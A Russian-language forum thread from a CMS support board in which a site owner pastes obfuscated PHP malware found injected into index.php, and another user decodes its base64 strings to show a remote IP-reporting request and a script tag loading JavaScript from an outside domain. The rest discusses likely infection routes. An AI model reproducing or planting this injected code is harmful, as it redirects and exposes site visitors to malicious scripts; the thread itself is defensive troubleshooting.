SV911 Опубликовано 14 марта, 2013 Жалоба Поделиться Опубликовано 14 марта, 2013 Начались жалобы от клиентов о том, что анивирусы ругаются на мой сайт.Проверив все хорошенько обнаружил вот такой лишний кусок кода в index.php в корне сайта:function sql2_safe($in) { $rtn = base64_decode($in); return $rtn; } function collectnewss() { if (!isset($_COOKIE["iJijkdaMnerys"])) { $value = 'yadeor'; $ip = $_SERVER['REMOTE_ADDR']; $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip; $file = @fopen ($get, "r"); $content = @fread($file, 1000); @setcookie("iJijkdaMnerys", $value, time()+3600*24); if (!$content) echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4="); else echo $content; } } collectnewss ();Когда открываешь любую страничку - внизу появлялась вот такая строчка:<script src="http://feelthesame.changeip.name/rsize.js"></script>Кто сталкивался? Какие мысли есть откуда появилось?Возможен ли вариант, что этот кусок кода добавил кто то у кого был доступ к фтп (пару разработчиков с этого форума имеют доступ) или это добавлено через какую то уязвимость симплы? Цитата Ссылка на сообщение Поделиться на другие сайты
delprofile Опубликовано 14 марта, 2013 Жалоба Поделиться Опубликовано 14 марта, 2013 Вы могли его сами занести со своего же компа. Обычно так и происходит.Ваш комп заражён открыв сессию вирус пробирается на фтп и прописывается в нужных файлах.http://easylife-ru.getdefault.com/%D0%BD%D0%B0-%D1%81%D0%B0%D0%B9%D1%82%D0%B5-%D0%BE%D0%B1%D0%BD%D0%B0%D1%80%D1%83%D0%B6%D0%B5%D0%BD-%D0%BF%D0%BE%D1%82%D0%B5%D0%BD%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE-%D0%BE%D0%BF%D0%B0%D1%81/http://opencartforum.ru/topic/17410-%D1%80%D0%B5%D1%88%D0%B5%D0%BD%D0%BE-%D1%81%D1%82%D0%BE%D1%80%D0%BE%D0%BD%D0%BD%D0%B8%D0%B9-%D0%BA%D0%BE%D0%B4-%D0%B2-%D1%84%D0%B0%D0%B9%D0%BB%D0%B0%D1%85-%D0%BE%D1%88%D0%B8%D0%B1%D0%BA%D0%B0-%D0%B2-%D1%84%D0%B0%D0%B9%D0%BB%D0%B5-wwwindexphp/РаскодировкаaHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=http://xxxporno.xxuz.com:888/move.php?ip= PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=<script src="http://feelthesame.changeip.name/rsize.js"></script>Простым языком это грабер траффика с попандер окном Цитата Ссылка на сообщение Поделиться на другие сайты
SV911 Опубликовано 14 марта, 2013 Автор Жалоба Поделиться Опубликовано 14 марта, 2013 Принцип попадания понял. Действительно это может происходить из за вируса на компе. При этом у меня с компа есть доступ к 8 сайтам. На 7 сайтах все ок. У них нет такой проблемы. И только к одному зараженному есть доступ не только у меня. Значит все таки вирус у кого то с программистов. ((( Цитата Ссылка на сообщение Поделиться на другие сайты
SimplaDev Опубликовано 15 марта, 2013 Жалоба Поделиться Опубликовано 15 марта, 2013 Частенько владельцы нуленных сайтов жалуются на такие проблемы, т.к. скачивают неизвестно где, думая, что качают на халяву Цитата Ссылка на сообщение Поделиться на другие сайты
SimplaDev Опубликовано 15 марта, 2013 Жалоба Поделиться Опубликовано 15 марта, 2013 Хотя вот сегодня обратились ко мне со сходной проблемой, там htaccess вирус поправил слегка и пару файлов записал. Что интересно другие сайты у человека оказались не заражены, так что дыра может быть и в Симпле. Цитата Ссылка на сообщение Поделиться на другие сайты
SV911 Опубликовано 17 марта, 2013 Автор Жалоба Поделиться Опубликовано 17 марта, 2013 У меня лицензия а не нуленая и скачанная неизвестно где Цитата Ссылка на сообщение Поделиться на другие сайты
svma3x Опубликовано 17 декабря, 2015 Жалоба Поделиться Опубликовано 17 декабря, 2015 Хотя вот сегодня обратились ко мне со сходной проблемой, там htaccess вирус поправил слегка и пару файлов записал. Что интересно другие сайты у человека оказались не заражены, так что дыра может быть и в Симпле. Добрый день - подскажите нашли дырку или нет - сегодня у меня произошла та же беда только htaccess затерли полностью и сделали папку с ярлыком на корневую директорию - пришлось залочить фтп от изменений - но это не дело - я думаю что дыра где в js скриптах но вот конкретно еще не ковырял - может вы уже нашли место стандартных атак?) Удар нанесли по двум сайтам - хотя сайтов на симпле много на хостинге поэтому вариант вируса исключаю - да и у меня mac так что подхватить что-то врятли тоже. Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.